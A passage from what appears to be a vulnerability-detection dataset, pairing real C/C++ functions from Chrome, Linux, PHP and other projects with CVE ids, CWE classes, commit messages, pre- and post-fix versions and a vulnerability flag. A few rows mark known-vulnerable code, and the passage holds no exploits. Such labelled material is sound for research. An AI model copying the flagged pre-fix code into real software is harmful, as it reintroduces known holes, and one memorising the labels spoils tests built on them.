pairs[i].key = VARDATA_ANY(in_datums[i * 2]);
pairs[i].val = VARDATA_ANY(in_datums[i * 2 + 1]);
pairs[i].keylen = hstoreCheckKeyLen(VARSIZE_ANY_EXHDR(in_datums[i * 2]));
pairs[i].vallen = hstoreCheckValLen(VARSIZE_ANY_EXHDR(in_datums[i * 2 + 1]));
pairs[i].isnull = false;
pairs[i].needfree = false;
}
}
count = hstoreUniquePairs(pairs, count, &buflen);
out = hstorePairs(pairs, count, buflen);
PG_RETURN_POINTER(out);
}
| C | postgres | 1 |
CVE-2015-6773 | https://www.cvedetails.com/cve/CVE-2015-6773/ | CWE-119 | https://github.com/chromium/chromium/commit/33827275411b33371e7bb750cce20f11de85002d | 33827275411b33371e7bb750cce20f11de85002d | Move SelectionTemplate::is_handle_visible_ to FrameSelection
This patch moves |is_handle_visible_| to |FrameSelection| from |SelectionTemplate|
since handle visibility is used only for setting |FrameSelection|, hence it is
a redundant member variable of |SelectionTemplate|.
Bug: 742093
Change-Id: I3add4da3844fb40be34dcb4d4b46b5fa6fed1d7e
Reviewed-on: https://chromium-review.googlesource.com/595389
Commit-Queue: Yoshifumi Inoue <yosin@chromium.org>
Reviewed-by: Xiaocheng Hu <xiaochengh@chromium.org>
Reviewed-by: Kent Tamura <tkent@chromium.org>
Cr-Commit-Position: refs/heads/master@{#491660} | DispatchEventResult DispatchSelectStart(Node* node) {
if (!node || !node->GetLayoutObject())
return DispatchEventResult::kNotCanceled;
return node->DispatchEvent(
Event::CreateCancelableBubble(EventTypeNames::selectstart));
}
| DispatchEventResult DispatchSelectStart(Node* node) {
if (!node || !node->GetLayoutObject())
return DispatchEventResult::kNotCanceled;
return node->DispatchEvent(
Event::CreateCancelableBubble(EventTypeNames::selectstart));
}
| C | Chrome | 0 |
CVE-2011-4718 | https://www.cvedetails.com/cve/CVE-2011-4718/ | CWE-264 | https://git.php.net/?p=php-src.git;a=commit;h=25e8fcc88fa20dc9d4c47184471003f436927cde | 25e8fcc88fa20dc9d4c47184471003f436927cde | null | static inline void php_rinit_session_globals(TSRMLS_D) /* {{{ */
{
PS(mod_data) = NULL;
PS(mod_user_is_open) = 0;
/* Do NOT init PS(mod_user_names) here! */
PS(http_session_vars) = NULL;
}
/* }}} */
| static inline void php_rinit_session_globals(TSRMLS_D) /* {{{ */
{
PS(mod_data) = NULL;
PS(mod_user_is_open) = 0;
/* Do NOT init PS(mod_user_names) here! */
PS(http_session_vars) = NULL;
}
/* }}} */
| C | php | 0 |
null | null | null | https://github.com/chromium/chromium/commit/fc790462b4f248712bbc8c3734664dd6b05f80f2 | fc790462b4f248712bbc8c3734664dd6b05f80f2 | Set the job name for the print job on the Mac.
BUG=http://crbug.com/29188
TEST=as in bug
Review URL: http://codereview.chromium.org/1997016
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@47056 0039d316-1c4b-4281-b951-d872f2087c98 | void ResourceMessageFilter::OnCreateWorker(
const ViewHostMsg_CreateWorker_Params& params, int* route_id) {
*route_id = params.route_id != MSG_ROUTING_NONE ?
params.route_id : render_widget_helper_->GetNextRoutingID();
WorkerService::GetInstance()->CreateWorker(
params.url, params.is_shared, off_the_record(), params.name,
params.document_id, id(), params.render_view_route_id, this, *route_id,
db_dispatcher_host_->database_tracker(),
GetRequestContextForURL(params.url)->host_content_settings_map());
}
| void ResourceMessageFilter::OnCreateWorker(
const ViewHostMsg_CreateWorker_Params& params, int* route_id) {
*route_id = params.route_id != MSG_ROUTING_NONE ?
params.route_id : render_widget_helper_->GetNextRoutingID();
WorkerService::GetInstance()->CreateWorker(
params.url, params.is_shared, off_the_record(), params.name,
params.document_id, id(), params.render_view_route_id, this, *route_id,
db_dispatcher_host_->database_tracker(),
GetRequestContextForURL(params.url)->host_content_settings_map());
}
| C | Chrome | 0 |
CVE-2017-12588 | https://www.cvedetails.com/cve/CVE-2017-12588/ | CWE-134 | https://github.com/rsyslog/rsyslog/commit/062d0c671a29f7c6f7dff4a2f1f35df375bbb30b | 062d0c671a29f7c6f7dff4a2f1f35df375bbb30b | Merge pull request #1565 from Whissi/fix-format-security-issue-in-zmq-modules
Fix format security issue in zmq3 modules | std_checkRuleset_genErrMsg(__attribute__((unused)) modConfData_t *modConf, instanceConf_t *inst)
{
errmsg.LogError(0, NO_ERRCODE, "imzmq3: ruleset '%s' for socket %s not found - "
"using default ruleset instead", inst->pszBindRuleset,
inst->description);
}
| std_checkRuleset_genErrMsg(__attribute__((unused)) modConfData_t *modConf, instanceConf_t *inst)
{
errmsg.LogError(0, NO_ERRCODE, "imzmq3: ruleset '%s' for socket %s not found - "
"using default ruleset instead", inst->pszBindRuleset,
inst->description);
}
| C | rsyslog | 0 |
CVE-2014-9903 | https://www.cvedetails.com/cve/CVE-2014-9903/ | CWE-200 | https://github.com/torvalds/linux/commit/4efbc454ba68def5ef285b26ebfcfdb605b52755 | 4efbc454ba68def5ef285b26ebfcfdb605b52755 | sched: Fix information leak in sys_sched_getattr()
We're copying the on-stack structure to userspace, but forgot to give
the right number of bytes to copy. This allows the calling process to
obtain up to PAGE_SIZE bytes from the stack (and possibly adjacent
kernel memory).
This fix copies only as much as we actually have on the stack
(attr->size defaults to the size of the struct) and leaves the rest of
the userspace-provided buffer untouched.
Found using kmemcheck + trinity.
Fixes: d50dde5a10f30 ("sched: Add new scheduler syscalls to support an extended scheduling parameters ABI")
Cc: Dario Faggioli <raistlin@linux.it>
Cc: Juri Lelli <juri.lelli@gmail.com>
Cc: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: Peter Zijlstra <peterz@infradead.org>
Link: http://lkml.kernel.org/r/1392585857-10725-1-git-send-email-vegard.nossum@oracle.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de> | bool __dl_overflow(struct dl_bw *dl_b, int cpus, u64 old_bw, u64 new_bw)
{
return dl_b->bw != -1 &&
dl_b->bw * cpus < dl_b->total_bw - old_bw + new_bw;
}
| bool __dl_overflow(struct dl_bw *dl_b, int cpus, u64 old_bw, u64 new_bw)
{
return dl_b->bw != -1 &&
dl_b->bw * cpus < dl_b->total_bw - old_bw + new_bw;
}
| C | linux | 0 |
CVE-2011-4112 | https://www.cvedetails.com/cve/CVE-2011-4112/ | CWE-264 | https://github.com/torvalds/linux/commit/550fd08c2cebad61c548def135f67aba284c6162 | 550fd08c2cebad61c548def135f67aba284c6162 | net: Audit drivers to identify those needing IFF_TX_SKB_SHARING cleared
After the last patch, We are left in a state in which only drivers calling
ether_setup have IFF_TX_SKB_SHARING set (we assume that drivers touching real
hardware call ether_setup for their net_devices and don't hold any state in
their skbs. There are a handful of drivers that violate this assumption of
course, and need to be fixed up. This patch identifies those drivers, and marks
them as not being able to support the safe transmission of skbs by clearning the
IFF_TX_SKB_SHARING flag in priv_flags
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
CC: Karsten Keil <isdn@linux-pingi.de>
CC: "David S. Miller" <davem@davemloft.net>
CC: Jay Vosburgh <fubar@us.ibm.com>
CC: Andy Gospodarek <andy@greyhouse.net>
CC: Patrick McHardy <kaber@trash.net>
CC: Krzysztof Halasa <khc@pm.waw.pl>
CC: "John W. Linville" <linville@tuxdriver.com>
CC: Greg Kroah-Hartman <gregkh@suse.de>
CC: Marcel Holtmann <marcel@holtmann.org>
CC: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: David S. Miller <davem@davemloft.net> | static int airo_set_essid(struct net_device *dev,
struct iw_request_info *info,
struct iw_point *dwrq,
char *extra)
{
struct airo_info *local = dev->ml_priv;
SsidRid SSID_rid; /* SSIDs */
/* Reload the list of current SSID */
readSsidRid(local, &SSID_rid);
/* Check if we asked for `any' */
if (dwrq->flags == 0) {
/* Just send an empty SSID list */
memset(&SSID_rid, 0, sizeof(SSID_rid));
} else {
unsigned index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
/* Check the size of the string */
if (dwrq->length > IW_ESSID_MAX_SIZE)
return -E2BIG ;
/* Check if index is valid */
if (index >= ARRAY_SIZE(SSID_rid.ssids))
return -EINVAL;
/* Set the SSID */
memset(SSID_rid.ssids[index].ssid, 0,
sizeof(SSID_rid.ssids[index].ssid));
memcpy(SSID_rid.ssids[index].ssid, extra, dwrq->length);
SSID_rid.ssids[index].len = cpu_to_le16(dwrq->length);
}
SSID_rid.len = cpu_to_le16(sizeof(SSID_rid));
/* Write it to the card */
disable_MAC(local, 1);
writeSsidRid(local, &SSID_rid, 1);
enable_MAC(local, 1);
return 0;
}
| static int airo_set_essid(struct net_device *dev,
struct iw_request_info *info,
struct iw_point *dwrq,
char *extra)
{
struct airo_info *local = dev->ml_priv;
SsidRid SSID_rid; /* SSIDs */
/* Reload the list of current SSID */
readSsidRid(local, &SSID_rid);
/* Check if we asked for `any' */
if (dwrq->flags == 0) {
/* Just send an empty SSID list */
memset(&SSID_rid, 0, sizeof(SSID_rid));
} else {
unsigned index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
/* Check the size of the string */
if (dwrq->length > IW_ESSID_MAX_SIZE)
return -E2BIG ;
/* Check if index is valid */
if (index >= ARRAY_SIZE(SSID_rid.ssids))
return -EINVAL;
/* Set the SSID */
memset(SSID_rid.ssids[index].ssid, 0,
sizeof(SSID_rid.ssids[index].ssid));
memcpy(SSID_rid.ssids[index].ssid, extra, dwrq->length);
SSID_rid.ssids[index].len = cpu_to_le16(dwrq->length);
}
SSID_rid.len = cpu_to_le16(sizeof(SSID_rid));
/* Write it to the card */
disable_MAC(local, 1);
writeSsidRid(local, &SSID_rid, 1);
enable_MAC(local, 1);
return 0;
}
| C | linux | 0 |
CVE-2015-1229 | https://www.cvedetails.com/cve/CVE-2015-1229/ | CWE-19 | https://github.com/chromium/chromium/commit/7933c117fd16b192e70609c331641e9112af5e42 | 7933c117fd16b192e70609c331641e9112af5e42 | Sanitize headers in Proxy Authentication Required responses
BUG=431504
Review URL: https://codereview.chromium.org/769043003
Cr-Commit-Position: refs/heads/master@{#310014} | void MockGenerateRandom1(uint8* output, size_t n) {
static const uint8 bytes[] = {
0x55, 0x29, 0x66, 0x26, 0x6b, 0x9c, 0x73, 0x54
};
static size_t current_byte = 0;
for (size_t i = 0; i < n; ++i) {
output[i] = bytes[current_byte++];
current_byte %= arraysize(bytes);
}
}
| void MockGenerateRandom1(uint8* output, size_t n) {
static const uint8 bytes[] = {
0x55, 0x29, 0x66, 0x26, 0x6b, 0x9c, 0x73, 0x54
};
static size_t current_byte = 0;
for (size_t i = 0; i < n; ++i) {
output[i] = bytes[current_byte++];
current_byte %= arraysize(bytes);
}
}
| C | Chrome | 0 |
CVE-2014-4014 | https://www.cvedetails.com/cve/CVE-2014-4014/ | CWE-264 | https://github.com/torvalds/linux/commit/23adbe12ef7d3d4195e80800ab36b37bee28cd03 | 23adbe12ef7d3d4195e80800ab36b37bee28cd03 | fs,userns: Change inode_capable to capable_wrt_inode_uidgid
The kernel has no concept of capabilities with respect to inodes; inodes
exist independently of namespaces. For example, inode_capable(inode,
CAP_LINUX_IMMUTABLE) would be nonsense.
This patch changes inode_capable to check for uid and gid mappings and
renames it to capable_wrt_inode_uidgid, which should make it more
obvious what it does.
Fixes CVE-2014-4014.
Cc: Theodore Ts'o <tytso@mit.edu>
Cc: Serge Hallyn <serge.hallyn@ubuntu.com>
Cc: "Eric W. Biederman" <ebiederm@xmission.com>
Cc: Dave Chinner <david@fromorbit.com>
Cc: stable@vger.kernel.org
Signed-off-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | static void evict(struct inode *inode)
{
const struct super_operations *op = inode->i_sb->s_op;
BUG_ON(!(inode->i_state & I_FREEING));
BUG_ON(!list_empty(&inode->i_lru));
if (!list_empty(&inode->i_wb_list))
inode_wb_list_del(inode);
inode_sb_list_del(inode);
/*
* Wait for flusher thread to be done with the inode so that filesystem
* does not start destroying it while writeback is still running. Since
* the inode has I_FREEING set, flusher thread won't start new work on
* the inode. We just have to wait for running writeback to finish.
*/
inode_wait_for_writeback(inode);
if (op->evict_inode) {
op->evict_inode(inode);
} else {
truncate_inode_pages_final(&inode->i_data);
clear_inode(inode);
}
if (S_ISBLK(inode->i_mode) && inode->i_bdev)
bd_forget(inode);
if (S_ISCHR(inode->i_mode) && inode->i_cdev)
cd_forget(inode);
remove_inode_hash(inode);
spin_lock(&inode->i_lock);
wake_up_bit(&inode->i_state, __I_NEW);
BUG_ON(inode->i_state != (I_FREEING | I_CLEAR));
spin_unlock(&inode->i_lock);
destroy_inode(inode);
}
| static void evict(struct inode *inode)
{
const struct super_operations *op = inode->i_sb->s_op;
BUG_ON(!(inode->i_state & I_FREEING));
BUG_ON(!list_empty(&inode->i_lru));
if (!list_empty(&inode->i_wb_list))
inode_wb_list_del(inode);
inode_sb_list_del(inode);
/*
* Wait for flusher thread to be done with the inode so that filesystem
* does not start destroying it while writeback is still running. Since
* the inode has I_FREEING set, flusher thread won't start new work on
* the inode. We just have to wait for running writeback to finish.
*/
inode_wait_for_writeback(inode);
if (op->evict_inode) {
op->evict_inode(inode);
} else {
truncate_inode_pages_final(&inode->i_data);
clear_inode(inode);
}
if (S_ISBLK(inode->i_mode) && inode->i_bdev)
bd_forget(inode);
if (S_ISCHR(inode->i_mode) && inode->i_cdev)
cd_forget(inode);
remove_inode_hash(inode);
spin_lock(&inode->i_lock);
wake_up_bit(&inode->i_state, __I_NEW);
BUG_ON(inode->i_state != (I_FREEING | I_CLEAR));
spin_unlock(&inode->i_lock);
destroy_inode(inode);
}
| C | linux | 0 |
CVE-2014-1700 | https://www.cvedetails.com/cve/CVE-2014-1700/ | CWE-399 | https://github.com/chromium/chromium/commit/685c3980d31b5199924086b8c93a1ce751d24733 | 685c3980d31b5199924086b8c93a1ce751d24733 | content: Rename webkit_test_helpers.{cc,h} to blink_test_helpers.{cc,h}
Now that webkit/ is gone, we are preparing ourselves for the merge of
third_party/WebKit into //blink.
BUG=None
BUG=content_shell && content_unittests
R=avi@chromium.org
Review URL: https://codereview.chromium.org/1118183003
Cr-Commit-Position: refs/heads/master@{#328202} | void ShellContentBrowserClient::GetAdditionalMappedFilesForChildProcess(
const base::CommandLine& command_line,
int child_process_id,
FileDescriptorInfo* mappings) {
#if defined(V8_USE_EXTERNAL_STARTUP_DATA)
if (v8_natives_fd_.get() == -1 || v8_snapshot_fd_.get() == -1) {
int v8_natives_fd = -1;
int v8_snapshot_fd = -1;
if (gin::V8Initializer::OpenV8FilesForChildProcesses(&v8_natives_fd,
&v8_snapshot_fd)) {
v8_natives_fd_.reset(v8_natives_fd);
v8_snapshot_fd_.reset(v8_snapshot_fd);
}
}
DCHECK(v8_natives_fd_.get() != -1 && v8_snapshot_fd_.get() != -1);
mappings->Share(kV8NativesDataDescriptor, v8_natives_fd_.get());
mappings->Share(kV8SnapshotDataDescriptor, v8_snapshot_fd_.get());
#endif // V8_USE_EXTERNAL_STARTUP_DATA
#if defined(OS_ANDROID)
int flags = base::File::FLAG_OPEN | base::File::FLAG_READ;
base::FilePath pak_file;
bool r = PathService::Get(base::DIR_ANDROID_APP_DATA, &pak_file);
CHECK(r);
pak_file = pak_file.Append(FILE_PATH_LITERAL("paks"));
pak_file = pak_file.Append(FILE_PATH_LITERAL("content_shell.pak"));
base::File f(pak_file, flags);
if (!f.IsValid()) {
NOTREACHED() << "Failed to open file when creating renderer process: "
<< "content_shell.pak";
}
mappings->Transfer(kShellPakDescriptor, base::ScopedFD(f.TakePlatformFile()));
if (breakpad::IsCrashReporterEnabled()) {
f = breakpad::CrashDumpManager::GetInstance()->CreateMinidumpFile(
child_process_id);
if (!f.IsValid()) {
LOG(ERROR) << "Failed to create file for minidump, crash reporting will "
<< "be disabled for this process.";
} else {
mappings->Transfer(kAndroidMinidumpDescriptor,
base::ScopedFD(f.TakePlatformFile()));
}
}
#else // !defined(OS_ANDROID)
int crash_signal_fd = GetCrashSignalFD(command_line);
if (crash_signal_fd >= 0) {
mappings->Share(kCrashDumpSignal, crash_signal_fd);
}
#endif // defined(OS_ANDROID)
}
| void ShellContentBrowserClient::GetAdditionalMappedFilesForChildProcess(
const base::CommandLine& command_line,
int child_process_id,
FileDescriptorInfo* mappings) {
#if defined(V8_USE_EXTERNAL_STARTUP_DATA)
if (v8_natives_fd_.get() == -1 || v8_snapshot_fd_.get() == -1) {
int v8_natives_fd = -1;
int v8_snapshot_fd = -1;
if (gin::V8Initializer::OpenV8FilesForChildProcesses(&v8_natives_fd,
&v8_snapshot_fd)) {
v8_natives_fd_.reset(v8_natives_fd);
v8_snapshot_fd_.reset(v8_snapshot_fd);
}
}
DCHECK(v8_natives_fd_.get() != -1 && v8_snapshot_fd_.get() != -1);
mappings->Share(kV8NativesDataDescriptor, v8_natives_fd_.get());
mappings->Share(kV8SnapshotDataDescriptor, v8_snapshot_fd_.get());
#endif // V8_USE_EXTERNAL_STARTUP_DATA
#if defined(OS_ANDROID)
int flags = base::File::FLAG_OPEN | base::File::FLAG_READ;
base::FilePath pak_file;
bool r = PathService::Get(base::DIR_ANDROID_APP_DATA, &pak_file);
CHECK(r);
pak_file = pak_file.Append(FILE_PATH_LITERAL("paks"));
pak_file = pak_file.Append(FILE_PATH_LITERAL("content_shell.pak"));
base::File f(pak_file, flags);
if (!f.IsValid()) {
NOTREACHED() << "Failed to open file when creating renderer process: "
<< "content_shell.pak";
}
mappings->Transfer(kShellPakDescriptor, base::ScopedFD(f.TakePlatformFile()));
if (breakpad::IsCrashReporterEnabled()) {
f = breakpad::CrashDumpManager::GetInstance()->CreateMinidumpFile(
child_process_id);
if (!f.IsValid()) {
LOG(ERROR) << "Failed to create file for minidump, crash reporting will "
<< "be disabled for this process.";
} else {
mappings->Transfer(kAndroidMinidumpDescriptor,
base::ScopedFD(f.TakePlatformFile()));
}
}
#else // !defined(OS_ANDROID)
int crash_signal_fd = GetCrashSignalFD(command_line);
if (crash_signal_fd >= 0) {
mappings->Share(kCrashDumpSignal, crash_signal_fd);
}
#endif // defined(OS_ANDROID)
}
| C | Chrome | 0 |
CVE-2012-5136 | https://www.cvedetails.com/cve/CVE-2012-5136/ | CWE-20 | https://github.com/chromium/chromium/commit/401d30ef93030afbf7e81e53a11b68fc36194502 | 401d30ef93030afbf7e81e53a11b68fc36194502 | Refactoring: Move m_mayDisplaySeamlesslyWithParent down to Document
The member is used only in Document, thus no reason to
stay in SecurityContext.
TEST=none
BUG=none
R=haraken@chromium.org, abarth, haraken, hayato
Review URL: https://codereview.chromium.org/27615003
git-svn-id: svn://svn.chromium.org/blink/trunk@159829 bbb929c8-8fbe-4397-9dbb-9b2b20218538 | void Document::clearAXObjectCache()
{
ASSERT(topDocument() == this);
m_axObjectCache.clear();
}
| void Document::clearAXObjectCache()
{
ASSERT(topDocument() == this);
m_axObjectCache.clear();
}
| C | Chrome | 0 |
CVE-2017-11171 | https://www.cvedetails.com/cve/CVE-2017-11171/ | CWE-835 | https://github.com/GNOME/gnome-session/commit/b0dc999e0b45355314616321dbb6cb71e729fc9d | b0dc999e0b45355314616321dbb6cb71e729fc9d | [gsm] Delay the creation of the GsmXSMPClient until it really exists
We used to create the GsmXSMPClient before the XSMP connection is really
accepted. This can lead to some issues, though. An example is:
https://bugzilla.gnome.org/show_bug.cgi?id=598211#c19. Quoting:
"What is happening is that a new client (probably metacity in your
case) is opening an ICE connection in the GSM_MANAGER_PHASE_END_SESSION
phase, which causes a new GsmXSMPClient to be added to the client
store. The GSM_MANAGER_PHASE_EXIT phase then begins before the client
has had a chance to establish a xsmp connection, which means that
client->priv->conn will not be initialized at the point that xsmp_stop
is called on the new unregistered client."
The fix is to create the GsmXSMPClient object when there's a real XSMP
connection. This implies moving the timeout that makes sure we don't
have an empty client to the XSMP server.
https://bugzilla.gnome.org/show_bug.cgi?id=598211 | ice_error_handler (IceConn conn,
Bool swap,
int offending_minor_opcode,
unsigned long offending_sequence,
int error_class,
int severity,
IcePointer values)
{
g_debug ("GsmXsmpServer: ice_error_handler (%p, %s, %d, %lx, %d, %d)",
conn, swap ? "TRUE" : "FALSE", offending_minor_opcode,
offending_sequence, error_class, severity);
if (severity == IceCanContinue) {
return;
}
/* FIXME: the ICElib docs are completely vague about what we're
* supposed to do in this case. Need to verify that calling
* IceCloseConnection() here is guaranteed to cause neither
* free-memory-reads nor leaks.
*/
IceCloseConnection (conn);
}
| ice_error_handler (IceConn conn,
Bool swap,
int offending_minor_opcode,
unsigned long offending_sequence,
int error_class,
int severity,
IcePointer values)
{
g_debug ("GsmXsmpServer: ice_error_handler (%p, %s, %d, %lx, %d, %d)",
conn, swap ? "TRUE" : "FALSE", offending_minor_opcode,
offending_sequence, error_class, severity);
if (severity == IceCanContinue) {
return;
}
/* FIXME: the ICElib docs are completely vague about what we're
* supposed to do in this case. Need to verify that calling
* IceCloseConnection() here is guaranteed to cause neither
* free-memory-reads nor leaks.
*/
IceCloseConnection (conn);
}
| C | gnome-session | 0 |
CVE-2013-2906 | https://www.cvedetails.com/cve/CVE-2013-2906/ | CWE-362 | https://github.com/chromium/chromium/commit/603af455b5641671b18d7d7d166630341d71b63f | 603af455b5641671b18d7d7d166630341d71b63f | Remove dependency of TranslateInfobarDelegate on profile
This CL uses TranslateTabHelper instead of Profile and also cleans up
some unused code and irrelevant dependencies.
BUG=371845
Review URL: https://codereview.chromium.org/286973003
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@270758 0039d316-1c4b-4281-b951-d872f2087c98 | bool TranslateInfoBarDelegate::IsTranslatableLanguageByPrefs() {
TranslateTabHelper* translate_tab_helper =
TranslateTabHelper::FromWebContents(GetWebContents());
scoped_ptr<TranslatePrefs> translate_prefs(
TranslateTabHelper::CreateTranslatePrefs(
translate_tab_helper->GetPrefs()));
TranslateAcceptLanguages* accept_languages =
translate_tab_helper->GetTranslateAcceptLanguages();
return translate_prefs->CanTranslateLanguage(accept_languages,
original_language_code());
}
| bool TranslateInfoBarDelegate::IsTranslatableLanguageByPrefs() {
Profile* profile =
Profile::FromBrowserContext(GetWebContents()->GetBrowserContext());
Profile* original_profile = profile->GetOriginalProfile();
scoped_ptr<TranslatePrefs> translate_prefs(
TranslateTabHelper::CreateTranslatePrefs(original_profile->GetPrefs()));
TranslateAcceptLanguages* accept_languages =
TranslateTabHelper::GetTranslateAcceptLanguages(original_profile);
return translate_prefs->CanTranslateLanguage(accept_languages,
original_language_code());
}
| C | Chrome | 1 |
CVE-2015-8126 | https://www.cvedetails.com/cve/CVE-2015-8126/ | CWE-119 | https://github.com/chromium/chromium/commit/7f3d85b096f66870a15b37c2f40b219b2e292693 | 7f3d85b096f66870a15b37c2f40b219b2e292693 | third_party/libpng: update to 1.2.54
TBR=darin@chromium.org
BUG=560291
Review URL: https://codereview.chromium.org/1467263003
Cr-Commit-Position: refs/heads/master@{#362298} | png_set_read_status_fn(png_structp png_ptr, png_read_status_ptr read_row_fn)
{
if (png_ptr == NULL)
return;
png_ptr->read_row_fn = read_row_fn;
}
| png_set_read_status_fn(png_structp png_ptr, png_read_status_ptr read_row_fn)
{
if (png_ptr == NULL)
return;
png_ptr->read_row_fn = read_row_fn;
}
| C | Chrome | 0 |
CVE-2017-15389 | https://www.cvedetails.com/cve/CVE-2017-15389/ | CWE-20 | https://github.com/chromium/chromium/commit/5788690fb1395dc672ff9b3385dbfb1180ed710a | 5788690fb1395dc672ff9b3385dbfb1180ed710a | mac: Make RWHVMac::ClearCompositorFrame clear locks
Ensure that the BrowserCompositorMac not hold on to a compositor lock
when requested to clear its compositor frame. This lock may be held
indefinitely (if the renderer hangs) and so the frame will never be
cleared.
Bug: 739621
Change-Id: I15d0e82bdf632f3379a48e959f198afb8a4ac218
Reviewed-on: https://chromium-review.googlesource.com/608239
Commit-Queue: ccameron chromium <ccameron@chromium.org>
Reviewed-by: Ken Buchanan <kenrb@chromium.org>
Cr-Commit-Position: refs/heads/master@{#493563} | void DelegatedFrameHost::ReturnSubscriberTexture(
base::WeakPtr<DelegatedFrameHost> dfh,
scoped_refptr<OwnedMailbox> subscriber_texture,
const gpu::SyncToken& sync_token) {
if (!subscriber_texture.get())
return;
if (!dfh)
return;
subscriber_texture->UpdateSyncToken(sync_token);
if (dfh->frame_subscriber_ && subscriber_texture->texture_id())
dfh->idle_frame_subscriber_textures_.push_back(subscriber_texture);
}
| void DelegatedFrameHost::ReturnSubscriberTexture(
base::WeakPtr<DelegatedFrameHost> dfh,
scoped_refptr<OwnedMailbox> subscriber_texture,
const gpu::SyncToken& sync_token) {
if (!subscriber_texture.get())
return;
if (!dfh)
return;
subscriber_texture->UpdateSyncToken(sync_token);
if (dfh->frame_subscriber_ && subscriber_texture->texture_id())
dfh->idle_frame_subscriber_textures_.push_back(subscriber_texture);
}
| C | Chrome | 0 |
CVE-2014-2706 | https://www.cvedetails.com/cve/CVE-2014-2706/ | CWE-362 | https://github.com/torvalds/linux/commit/1d147bfa64293b2723c4fec50922168658e613ba | 1d147bfa64293b2723c4fec50922168658e613ba | mac80211: fix AP powersave TX vs. wakeup race
There is a race between the TX path and the STA wakeup: while
a station is sleeping, mac80211 buffers frames until it wakes
up, then the frames are transmitted. However, the RX and TX
path are concurrent, so the packet indicating wakeup can be
processed while a packet is being transmitted.
This can lead to a situation where the buffered frames list
is emptied on the one side, while a frame is being added on
the other side, as the station is still seen as sleeping in
the TX path.
As a result, the newly added frame will not be send anytime
soon. It might be sent much later (and out of order) when the
station goes to sleep and wakes up the next time.
Additionally, it can lead to the crash below.
Fix all this by synchronising both paths with a new lock.
Both path are not fastpath since they handle PS situations.
In a later patch we'll remove the extra skb queue locks to
reduce locking overhead.
BUG: unable to handle kernel
NULL pointer dereference at 000000b0
IP: [<ff6f1791>] ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
*pde = 00000000
Oops: 0000 [#1] SMP DEBUG_PAGEALLOC
EIP: 0060:[<ff6f1791>] EFLAGS: 00210282 CPU: 1
EIP is at ieee80211_report_used_skb+0x11/0x3e0 [mac80211]
EAX: e5900da0 EBX: 00000000 ECX: 00000001 EDX: 00000000
ESI: e41d00c0 EDI: e5900da0 EBP: ebe458e4 ESP: ebe458b0
DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068
CR0: 8005003b CR2: 000000b0 CR3: 25a78000 CR4: 000407d0
DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000
DR6: ffff0ff0 DR7: 00000400
Process iperf (pid: 3934, ti=ebe44000 task=e757c0b0 task.ti=ebe44000)
iwlwifi 0000:02:00.0: I iwl_pcie_enqueue_hcmd Sending command LQ_CMD (#4e), seq: 0x0903, 92 bytes at 3[3]:9
Stack:
e403b32c ebe458c4 00200002 00200286 e403b338 ebe458cc c10960bb e5900da0
ff76a6ec ebe458d8 00000000 e41d00c0 e5900da0 ebe458f0 ff6f1b75 e403b210
ebe4598c ff723dc1 00000000 ff76a6ec e597c978 e403b758 00000002 00000002
Call Trace:
[<ff6f1b75>] ieee80211_free_txskb+0x15/0x20 [mac80211]
[<ff723dc1>] invoke_tx_handlers+0x1661/0x1780 [mac80211]
[<ff7248a5>] ieee80211_tx+0x75/0x100 [mac80211]
[<ff7249bf>] ieee80211_xmit+0x8f/0xc0 [mac80211]
[<ff72550e>] ieee80211_subif_start_xmit+0x4fe/0xe20 [mac80211]
[<c149ef70>] dev_hard_start_xmit+0x450/0x950
[<c14b9aa9>] sch_direct_xmit+0xa9/0x250
[<c14b9c9b>] __qdisc_run+0x4b/0x150
[<c149f732>] dev_queue_xmit+0x2c2/0xca0
Cc: stable@vger.kernel.org
Reported-by: Yaara Rozenblum <yaara.rozenblum@intel.com>
Signed-off-by: Emmanuel Grumbach <emmanuel.grumbach@intel.com>
Reviewed-by: Stanislaw Gruszka <sgruszka@redhat.com>
[reword commit log, use a separate lock]
Signed-off-by: Johannes Berg <johannes.berg@intel.com> | void sta_info_init(struct ieee80211_local *local)
{
spin_lock_init(&local->tim_lock);
mutex_init(&local->sta_mtx);
INIT_LIST_HEAD(&local->sta_list);
setup_timer(&local->sta_cleanup, sta_info_cleanup,
(unsigned long)local);
}
| void sta_info_init(struct ieee80211_local *local)
{
spin_lock_init(&local->tim_lock);
mutex_init(&local->sta_mtx);
INIT_LIST_HEAD(&local->sta_list);
setup_timer(&local->sta_cleanup, sta_info_cleanup,
(unsigned long)local);
}
| C | linux | 0 |
CVE-2018-16641 | https://www.cvedetails.com/cve/CVE-2018-16641/ | CWE-772 | https://github.com/ImageMagick/ImageMagick/commit/256825d4eb33dc301496710d15cf5a7ae924088b | 256825d4eb33dc301496710d15cf5a7ae924088b | Fixed possible memory leak reported in #1206 | static int32 TIFFWritePixels(TIFF *tiff,TIFFInfo *tiff_info,ssize_t row,
tsample_t sample,Image *image)
{
int32
status;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
number_tiles,
tile_width;
ssize_t
bytes_per_pixel,
j,
k,
l;
if (TIFFIsTiled(tiff) == 0)
return(TIFFWriteScanline(tiff,tiff_info->scanline,(uint32) row,sample));
/*
Fill scanlines to tile height.
*/
i=(ssize_t) (row % tiff_info->tile_geometry.height)*TIFFScanlineSize(tiff);
(void) memcpy(tiff_info->scanlines+i,(char *) tiff_info->scanline,
(size_t) TIFFScanlineSize(tiff));
if (((size_t) (row % tiff_info->tile_geometry.height) !=
(tiff_info->tile_geometry.height-1)) &&
(row != (ssize_t) (image->rows-1)))
return(0);
/*
Write tile to TIFF image.
*/
status=0;
bytes_per_pixel=TIFFTileSize(tiff)/(ssize_t) (
tiff_info->tile_geometry.height*tiff_info->tile_geometry.width);
number_tiles=(image->columns+tiff_info->tile_geometry.width)/
tiff_info->tile_geometry.width;
for (i=0; i < (ssize_t) number_tiles; i++)
{
